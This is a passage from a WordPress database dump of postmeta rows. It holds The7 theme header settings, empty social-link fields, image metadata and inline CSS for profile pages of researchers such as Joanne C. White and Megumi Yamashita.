(18470,3029,'_dt_fancy_header_bg_parallax','0.5'),
(18471,3029,'_dt_fancy_header_responsiveness_heading',''),
(18472,3029,'_dt_fancy_header_responsiveness','enabled'),
(18473,3029,'_dt_fancy_header_responsiveness_switch','778px'),
(18474,3029,'_dt_fancy_header_responsive_height','70'),
(18475,3029,'_dt_fancy_header_responsive_font_size','30'),
(18476,3029,'_dt_fancy_header_responsive_title_line_height','38'),
(18477,3029,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(18478,3029,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(18479,3029,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(18480,3029,'_dt_teammate_options_go_to_single','1'),
(18481,3029,'_dt_teammate_options_position',''),
(18482,3029,'_dt_teammate_options_website',''),
(18483,3029,'_dt_teammate_options_mail',''),
(18484,3029,'_dt_teammate_options_facebook',''),
(18485,3029,'_dt_teammate_options_twitter',''),
(18486,3029,'_dt_teammate_options_dribbble',''),
(18487,3029,'_dt_teammate_options_you-tube',''),
(18488,3029,'_dt_teammate_options_rss',''),
(18489,3029,'_dt_teammate_options_delicious',''),
(18490,3029,'_dt_teammate_options_flickr',''),
(18491,3029,'_dt_teammate_options_lastfm',''),
(18492,3029,'_dt_teammate_options_linkedin',''),
(18493,3029,'_dt_teammate_options_vimeo',''),
(18494,3029,'_dt_teammate_options_tumbler',''),
(18495,3029,'_dt_teammate_options_pinterest',''),
(18496,3029,'_dt_teammate_options_devian',''),
(18497,3029,'_dt_teammate_options_skype',''),
(18498,3029,'_dt_teammate_options_github',''),
(18499,3029,'_dt_teammate_options_instagram',''),
(18500,3029,'_dt_teammate_options_stumbleupon',''),
(18501,3029,'_dt_teammate_options_behance',''),
(18502,3029,'_dt_teammate_options_px-500',''),
(18503,3029,'_dt_teammate_options_tripedvisor',''),
(18504,3029,'_dt_teammate_options_vk',''),
(18505,3029,'_dt_teammate_options_foursquare',''),
(18506,3029,'_dt_teammate_options_xing',''),
(18507,3029,'_dt_teammate_options_weibo',''),
(18508,3029,'_dt_teammate_options_odnoklassniki',''),
(18509,3029,'_dt_teammate_options_research-gate',''),
(18510,3029,'_dt_teammate_options_yelp',''),
(18511,3029,'_dt_teammate_options_blogger',''),
(18512,3029,'_dt_teammate_options_soundcloud',''),
(18513,3029,'_dt_teammate_options_viber',''),
(18514,3029,'_dt_teammate_options_whatsapp',''),
(18515,3029,'_dt_teammate_options_reddit',''),
(18516,3029,'_dt_teammate_options_snapchat',''),
(18517,3029,'_dt_teammate_options_telegram',''),
(18518,3029,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(18519,3031,'_edit_lock','1667935289:1'),
(18520,3032,'_wp_attached_file','2022/11/wss201.jpg'),
(18521,3032,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:146;s:6:\"height\";i:182;s:4:\"file\";s:18:\"2022/11/wss201.jpg\";s:8:\"filesize\";i:39214;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"wss201-146x150.jpg\";s:5:\"width\";i:146;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5407;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(18522,3031,'_thumbnail_id','3032'),
(18523,3031,'_edit_last','1'),
(18524,3031,'_dt_sidebar_position','right'),
(18525,3031,'_dt_sidebar_widgetarea_id','sidebar_1'),
(18526,3031,'_dt_sidebar_hide_on_mobile','0'),
(18527,3031,'_dt_footer_show','1'),
(18528,3031,'_dt_footer_widgetarea_id','sidebar_2'),
(18529,3031,'_dt_footer_hide_on_mobile','0'),
(18530,3031,'_dt_header_title','fancy'),
(18531,3031,'_dt_header_background','normal'),
(18532,3031,'_dt_header_background_below_slideshow','disabled'),
(18533,3031,'_dt_header_transparent_bg_color_scheme','light'),
(18534,3031,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(18535,3031,'_dt_header_transparent_top_bar_bg_opacity','25'),
(18536,3031,'_dt_header_transparent_bg_color','#000000'),
(18537,3031,'_dt_header_transparent_bg_opacity','50'),
(18538,3031,'_dt_header_disabled_background','normal'),
(18539,3031,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(18540,3031,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(18541,3031,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(18542,3031,'_dt_header_disabled_transparent_bg_color','#000000'),
(18543,3031,'_dt_header_disabled_transparent_bg_opacity','50'),
(18544,3031,'_dt_page_overrides_top_margin',''),
(18545,3031,'_dt_page_overrides_right_margin',''),
(18546,3031,'_dt_page_overrides_bottom_margin',''),
(18547,3031,'_dt_page_overrides_left_margin',''),
(18548,3031,'_dt_mobile_page_padding_top',''),
(18549,3031,'_dt_mobile_page_padding_right',''),
(18550,3031,'_dt_mobile_page_padding_bottom',''),
(18551,3031,'_dt_mobile_page_padding_left',''),
(18552,3031,'_dt_fancy_header_layout_heading',''),
(18553,3031,'_dt_fancy_header_title_aligment','center'),
(18554,3031,'_dt_fancy_header_height','300'),
(18555,3031,'_dt_fancy_header_padding-top','0px'),
(18556,3031,'_dt_fancy_header_padding-bottom','0px'),
(18557,3031,'_dt_fancy_header_breadcrumbs_heading',''),
(18558,3031,'_dt_fancy_header_breadcrumbs','disabled'),
(18559,3031,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(18560,3031,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(18561,3031,'_dt_fancy_header_title_heading',''),
(18562,3031,'_dt_fancy_header_title_mode','custom'),
(18563,3031,'_dt_fancy_header_title','Joanne C. White  Canadian Forest Service, Canada (WGI-7)'),
(18564,3031,'_dt_fancy_header_title_font_size','30'),
(18565,3031,'_dt_fancy_header_title_line_height','36'),
(18566,3031,'_dt_fancy_header_text_transform','none'),
(18567,3031,'_dt_fancy_header_title_color_mode','color'),
(18568,3031,'_dt_fancy_header_title_color','#ffffff'),
(18569,3031,'_dt_fancy_header_subtitle_heading',''),
(18570,3031,'_dt_fancy_header_subtitle',''),
(18571,3031,'_dt_fancy_header_subtitle_font_size','18'),
(18572,3031,'_dt_fancy_header_subtitle_line_height','26'),
(18573,3031,'_dt_fancy_header_subtitle_text_transform','none'),
(18574,3031,'_dt_fancy_header_subtitle_color_mode','color'),
(18575,3031,'_dt_fancy_header_subtitle_color','#ffffff'),
(18576,3031,'_dt_fancy_header_bg_heading',''),
(18577,3031,'_dt_fancy_header_bg_color','#222222'),
(18578,3031,'_dt_fancy_header_bg_image_origin','custom'),
(18579,3031,'_dt_fancy_header_bg_image','a:0:{}'),
(18580,3031,'_dt_fancy_header_bg_repeat','no-repeat'),
(18581,3031,'_dt_fancy_header_bg_position_x','center'),
(18582,3031,'_dt_fancy_header_bg_position_y','center'),
(18583,3031,'_dt_fancy_header_bg_fullscreen','1'),
(18584,3031,'_dt_fancy_header_bg_overlay','0'),
(18585,3031,'_dt_fancy_header_overlay_color','#000'),
(18586,3031,'_dt_fancy_header_bg_overlay_opacity','50'),
(18587,3031,'_dt_fancy_header_scroll_effect','default'),
(18588,3031,'_dt_fancy_header_bg_parallax','0.5'),
(18589,3031,'_dt_fancy_header_responsiveness_heading',''),
(18590,3031,'_dt_fancy_header_responsiveness','enabled'),
(18591,3031,'_dt_fancy_header_responsiveness_switch','778px'),
(18592,3031,'_dt_fancy_header_responsive_height','70'),
(18593,3031,'_dt_fancy_header_responsive_font_size','30'),
(18594,3031,'_dt_fancy_header_responsive_title_line_height','38'),
(18595,3031,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(18596,3031,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(18597,3031,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(18598,3031,'_dt_teammate_options_go_to_single','1'),
(18599,3031,'_dt_teammate_options_position',''),
(18600,3031,'_dt_teammate_options_website',''),
(18601,3031,'_dt_teammate_options_mail',''),
(18602,3031,'_dt_teammate_options_facebook',''),
(18603,3031,'_dt_teammate_options_twitter',''),
(18604,3031,'_dt_teammate_options_dribbble',''),
(18605,3031,'_dt_teammate_options_you-tube',''),
(18606,3031,'_dt_teammate_options_rss',''),
(18607,3031,'_dt_teammate_options_delicious',''),
(18608,3031,'_dt_teammate_options_flickr',''),
(18609,3031,'_dt_teammate_options_lastfm',''),
(18610,3031,'_dt_teammate_options_linkedin',''),
(18611,3031,'_dt_teammate_options_vimeo',''),
(18612,3031,'_dt_teammate_options_tumbler',''),
(18613,3031,'_dt_teammate_options_pinterest',''),
(18614,3031,'_dt_teammate_options_devian',''),
(18615,3031,'_dt_teammate_options_skype',''),
(18616,3031,'_dt_teammate_options_github',''),
(18617,3031,'_dt_teammate_options_instagram',''),
(18618,3031,'_dt_teammate_options_stumbleupon',''),
(18619,3031,'_dt_teammate_options_behance',''),
(18620,3031,'_dt_teammate_options_px-500',''),
(18621,3031,'_dt_teammate_options_tripedvisor',''),
(18622,3031,'_dt_teammate_options_vk',''),
(18623,3031,'_dt_teammate_options_foursquare',''),
(18624,3031,'_dt_teammate_options_xing',''),
(18625,3031,'_dt_teammate_options_weibo',''),
(18626,3031,'_dt_teammate_options_odnoklassniki',''),
(18627,3031,'_dt_teammate_options_research-gate',''),
(18628,3031,'_dt_teammate_options_yelp',''),
(18629,3031,'_dt_teammate_options_blogger',''),
(18630,3031,'_dt_teammate_options_soundcloud',''),
(18631,3031,'_dt_teammate_options_viber',''),
(18632,3031,'_dt_teammate_options_whatsapp',''),
(18633,3031,'_dt_teammate_options_reddit',''),
(18634,3031,'_dt_teammate_options_snapchat',''),
(18635,3031,'_dt_teammate_options_telegram',''),
(18636,3031,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(18637,3033,'_edit_lock','1667935348:1'),
(18638,3034,'_wp_attached_file','2022/11/wss202.jpg'),
(18639,3034,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:143;s:6:\"height\";i:184;s:4:\"file\";s:18:\"2022/11/wss202.jpg\";s:8:\"filesize\";i:47590;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"wss202-143x150.jpg\";s:5:\"width\";i:143;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6733;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(18640,3033,'_thumbnail_id','3034'),
(18641,3033,'_edit_last','1'),
(18642,3033,'_dt_sidebar_position','disabled'),
(18643,3033,'_dt_sidebar_widgetarea_id','sidebar_1'),
(18644,3033,'_dt_sidebar_hide_on_mobile','0'),
(18645,3033,'_dt_footer_show','1'),
(18646,3033,'_dt_footer_widgetarea_id','sidebar_2'),
(18647,3033,'_dt_footer_hide_on_mobile','0'),
(18648,3033,'_dt_header_title','fancy'),
(18649,3033,'_dt_header_background','normal'),
(18650,3033,'_dt_header_background_below_slideshow','disabled'),
(18651,3033,'_dt_header_transparent_bg_color_scheme','light'),
(18652,3033,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(18653,3033,'_dt_header_transparent_top_bar_bg_opacity','25'),
(18654,3033,'_dt_header_transparent_bg_color','#000000'),
(18655,3033,'_dt_header_transparent_bg_opacity','50'),
(18656,3033,'_dt_header_disabled_background','normal'),
(18657,3033,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(18658,3033,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(18659,3033,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(18660,3033,'_dt_header_disabled_transparent_bg_color','#000000'),
(18661,3033,'_dt_header_disabled_transparent_bg_opacity','50'),
(18662,3033,'_dt_page_overrides_top_margin',''),
(18663,3033,'_dt_page_overrides_right_margin',''),
(18664,3033,'_dt_page_overrides_bottom_margin',''),
(18665,3033,'_dt_page_overrides_left_margin',''),
(18666,3033,'_dt_mobile_page_padding_top',''),
(18667,3033,'_dt_mobile_page_padding_right',''),
(18668,3033,'_dt_mobile_page_padding_bottom',''),
(18669,3033,'_dt_mobile_page_padding_left',''),
(18670,3033,'_dt_fancy_header_layout_heading',''),
(18671,3033,'_dt_fancy_header_title_aligment','center'),
(18672,3033,'_dt_fancy_header_height','300'),
(18673,3033,'_dt_fancy_header_padding-top','0px'),
(18674,3033,'_dt_fancy_header_padding-bottom','0px'),
(18675,3033,'_dt_fancy_header_breadcrumbs_heading',''),
(18676,3033,'_dt_fancy_header_breadcrumbs','disabled'),
(18677,3033,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(18678,3033,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(18679,3033,'_dt_fancy_header_title_heading',''),
(18680,3033,'_dt_fancy_header_title_mode','custom'),
(18681,3033,'_dt_fancy_header_title','Maria Teresa Melis University of Cagliari, Italy (WGIII-1)'),
(18682,3033,'_dt_fancy_header_title_font_size','30'),
(18683,3033,'_dt_fancy_header_title_line_height','36'),
(18684,3033,'_dt_fancy_header_text_transform','none'),
(18685,3033,'_dt_fancy_header_title_color_mode','color'),
(18686,3033,'_dt_fancy_header_title_color','#ffffff'),
(18687,3033,'_dt_fancy_header_subtitle_heading',''),
(18688,3033,'_dt_fancy_header_subtitle',''),
(18689,3033,'_dt_fancy_header_subtitle_font_size','18'),
(18690,3033,'_dt_fancy_header_subtitle_line_height','26'),
(18691,3033,'_dt_fancy_header_subtitle_text_transform','none'),
(18692,3033,'_dt_fancy_header_subtitle_color_mode','color'),
(18693,3033,'_dt_fancy_header_subtitle_color','#ffffff'),
(18694,3033,'_dt_fancy_header_bg_heading',''),
(18695,3033,'_dt_fancy_header_bg_color','#222222'),
(18696,3033,'_dt_fancy_header_bg_image_origin','custom'),
(18697,3033,'_dt_fancy_header_bg_image','a:0:{}'),
(18698,3033,'_dt_fancy_header_bg_repeat','no-repeat'),
(18699,3033,'_dt_fancy_header_bg_position_x','center'),
(18700,3033,'_dt_fancy_header_bg_position_y','center'),
(18701,3033,'_dt_fancy_header_bg_fullscreen','1'),
(18702,3033,'_dt_fancy_header_bg_overlay','0'),
(18703,3033,'_dt_fancy_header_overlay_color','#000'),
(18704,3033,'_dt_fancy_header_bg_overlay_opacity','50'),
(18705,3033,'_dt_fancy_header_scroll_effect','default'),
(18706,3033,'_dt_fancy_header_bg_parallax','0.5'),
(18707,3033,'_dt_fancy_header_responsiveness_heading',''),
(18708,3033,'_dt_fancy_header_responsiveness','enabled'),
(18709,3033,'_dt_fancy_header_responsiveness_switch','778px'),
(18710,3033,'_dt_fancy_header_responsive_height','70'),
(18711,3033,'_dt_fancy_header_responsive_font_size','30'),
(18712,3033,'_dt_fancy_header_responsive_title_line_height','38'),
(18713,3033,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(18714,3033,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(18715,3033,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(18716,3033,'_dt_teammate_options_go_to_single','1'),
(18717,3033,'_dt_teammate_options_position',''),
(18718,3033,'_dt_teammate_options_website',''),
(18719,3033,'_dt_teammate_options_mail',''),
(18720,3033,'_dt_teammate_options_facebook',''),
(18721,3033,'_dt_teammate_options_twitter',''),
(18722,3033,'_dt_teammate_options_dribbble',''),
(18723,3033,'_dt_teammate_options_you-tube',''),
(18724,3033,'_dt_teammate_options_rss',''),
(18725,3033,'_dt_teammate_options_delicious',''),
(18726,3033,'_dt_teammate_options_flickr',''),
(18727,3033,'_dt_teammate_options_lastfm',''),
(18728,3033,'_dt_teammate_options_linkedin',''),
(18729,3033,'_dt_teammate_options_vimeo',''),
(18730,3033,'_dt_teammate_options_tumbler',''),
(18731,3033,'_dt_teammate_options_pinterest',''),
(18732,3033,'_dt_teammate_options_devian',''),
(18733,3033,'_dt_teammate_options_skype',''),
(18734,3033,'_dt_teammate_options_github',''),
(18735,3033,'_dt_teammate_options_instagram',''),
(18736,3033,'_dt_teammate_options_stumbleupon',''),
(18737,3033,'_dt_teammate_options_behance',''),
(18738,3033,'_dt_teammate_options_px-500',''),
(18739,3033,'_dt_teammate_options_tripedvisor',''),
(18740,3033,'_dt_teammate_options_vk',''),
(18741,3033,'_dt_teammate_options_foursquare',''),
(18742,3033,'_dt_teammate_options_xing',''),
(18743,3033,'_dt_teammate_options_weibo',''),
(18744,3033,'_dt_teammate_options_odnoklassniki',''),
(18745,3033,'_dt_teammate_options_research-gate',''),
(18746,3033,'_dt_teammate_options_yelp',''),
(18747,3033,'_dt_teammate_options_blogger',''),
(18748,3033,'_dt_teammate_options_soundcloud',''),
(18749,3033,'_dt_teammate_options_viber',''),
(18750,3033,'_dt_teammate_options_whatsapp',''),
(18751,3033,'_dt_teammate_options_reddit',''),
(18752,3033,'_dt_teammate_options_snapchat',''),
(18753,3033,'_dt_teammate_options_telegram',''),
(18754,3033,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(18755,3035,'_edit_lock','1667935404:1'),
(18756,3036,'_wp_attached_file','2022/11/wss203.jpg'),
(18757,3036,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:189;s:4:\"file\";s:18:\"2022/11/wss203.jpg\";s:8:\"filesize\";i:13160;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"wss203-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2009;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(18758,3035,'_thumbnail_id','3036'),
(18759,3035,'_edit_last','1'),
(18760,3035,'_dt_sidebar_position','disabled'),
(18761,3035,'_dt_sidebar_widgetarea_id','sidebar_1'),
(18762,3035,'_dt_sidebar_hide_on_mobile','0'),
(18763,3035,'_dt_footer_show','1'),
(18764,3035,'_dt_footer_widgetarea_id','sidebar_2'),
(18765,3035,'_dt_footer_hide_on_mobile','0'),
(18766,3035,'_dt_header_title','fancy'),
(18767,3035,'_dt_header_background','normal'),
(18768,3035,'_dt_header_background_below_slideshow','disabled'),
(18769,3035,'_dt_header_transparent_bg_color_scheme','light'),
(18770,3035,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(18771,3035,'_dt_header_transparent_top_bar_bg_opacity','25'),
(18772,3035,'_dt_header_transparent_bg_color','#000000'),
(18773,3035,'_dt_header_transparent_bg_opacity','50'),
(18774,3035,'_dt_header_disabled_background','normal'),
(18775,3035,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(18776,3035,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(18777,3035,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(18778,3035,'_dt_header_disabled_transparent_bg_color','#000000'),
(18779,3035,'_dt_header_disabled_transparent_bg_opacity','50'),
(18780,3035,'_dt_page_overrides_top_margin',''),
(18781,3035,'_dt_page_overrides_right_margin',''),
(18782,3035,'_dt_page_overrides_bottom_margin',''),
(18783,3035,'_dt_page_overrides_left_margin',''),
(18784,3035,'_dt_mobile_page_padding_top',''),
(18785,3035,'_dt_mobile_page_padding_right',''),
(18786,3035,'_dt_mobile_page_padding_bottom',''),
(18787,3035,'_dt_mobile_page_padding_left',''),
(18788,3035,'_dt_fancy_header_layout_heading',''),
(18789,3035,'_dt_fancy_header_title_aligment','center'),
(18790,3035,'_dt_fancy_header_height','300'),
(18791,3035,'_dt_fancy_header_padding-top','0px'),
(18792,3035,'_dt_fancy_header_padding-bottom','0px'),
(18793,3035,'_dt_fancy_header_breadcrumbs_heading',''),
(18794,3035,'_dt_fancy_header_breadcrumbs','disabled'),
(18795,3035,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(18796,3035,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(18797,3035,'_dt_fancy_header_title_heading',''),
(18798,3035,'_dt_fancy_header_title_mode','custom'),
(18799,3035,'_dt_fancy_header_title','Megumi Yamashita Tokyo University of Agriculture and Technology, Japan  (WGIII-8)'),
(18800,3035,'_dt_fancy_header_title_font_size','30'),
(18801,3035,'_dt_fancy_header_title_line_height','36'),
(18802,3035,'_dt_fancy_header_text_transform','none'),
(18803,3035,'_dt_fancy_header_title_color_mode','color'),
(18804,3035,'_dt_fancy_header_title_color','#ffffff'),
(18805,3035,'_dt_fancy_header_subtitle_heading',''),
(18806,3035,'_dt_fancy_header_subtitle',''),
(18807,3035,'_dt_fancy_header_subtitle_font_size','18'),
(18808,3035,'_dt_fancy_header_subtitle_line_height','26'),
(18809,3035,'_dt_fancy_header_subtitle_text_transform','none'),
(18810,3035,'_dt_fancy_header_subtitle_color_mode','color'),
(18811,3035,'_dt_fancy_header_subtitle_color','#ffffff'),
(18812,3035,'_dt_fancy_header_bg_heading',''),
(18813,3035,'_dt_fancy_header_bg_color','#222222'),
(18814,3035,'_dt_fancy_header_bg_image_origin','custom'),
(18815,3035,'_dt_fancy_header_bg_image','a:0:{}'),
(18816,3035,'_dt_fancy_header_bg_repeat','no-repeat'),
(18817,3035,'_dt_fancy_header_bg_position_x','center'),
(18818,3035,'_dt_fancy_header_bg_position_y','center'),
(18819,3035,'_dt_fancy_header_bg_fullscreen','1'),
(18820,3035,'_dt_fancy_header_bg_overlay','0'),
(18821,3035,'_dt_fancy_header_overlay_color','#000'),
(18822,3035,'_dt_fancy_header_bg_overlay_opacity','50'),
(18823,3035,'_dt_fancy_header_scroll_effect','default'),
(18824,3035,'_dt_fancy_header_bg_parallax','0.5'),
(18825,3035,'_dt_fancy_header_responsiveness_heading',''),
(18826,3035,'_dt_fancy_header_responsiveness','enabled'),
(18827,3035,'_dt_fancy_header_responsiveness_switch','778px'),
(18828,3035,'_dt_fancy_header_responsive_height','70'),
(18829,3035,'_dt_fancy_header_responsive_font_size','30'),
(18830,3035,'_dt_fancy_header_responsive_title_line_height','38'),
(18831,3035,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(18832,3035,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(18833,3035,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(18834,3035,'_dt_teammate_options_go_to_single','1'),
(18835,3035,'_dt_teammate_options_position',''),
(18836,3035,'_dt_teammate_options_website',''),
(18837,3035,'_dt_teammate_options_mail',''),
(18838,3035,'_dt_teammate_options_facebook',''),
(18839,3035,'_dt_teammate_options_twitter',''),
(18840,3035,'_dt_teammate_options_dribbble',''),
(18841,3035,'_dt_teammate_options_you-tube',''),
(18842,3035,'_dt_teammate_options_rss',''),
(18843,3035,'_dt_teammate_options_delicious',''),
(18844,3035,'_dt_teammate_options_flickr',''),
(18845,3035,'_dt_teammate_options_lastfm',''),
(18846,3035,'_dt_teammate_options_linkedin',''),
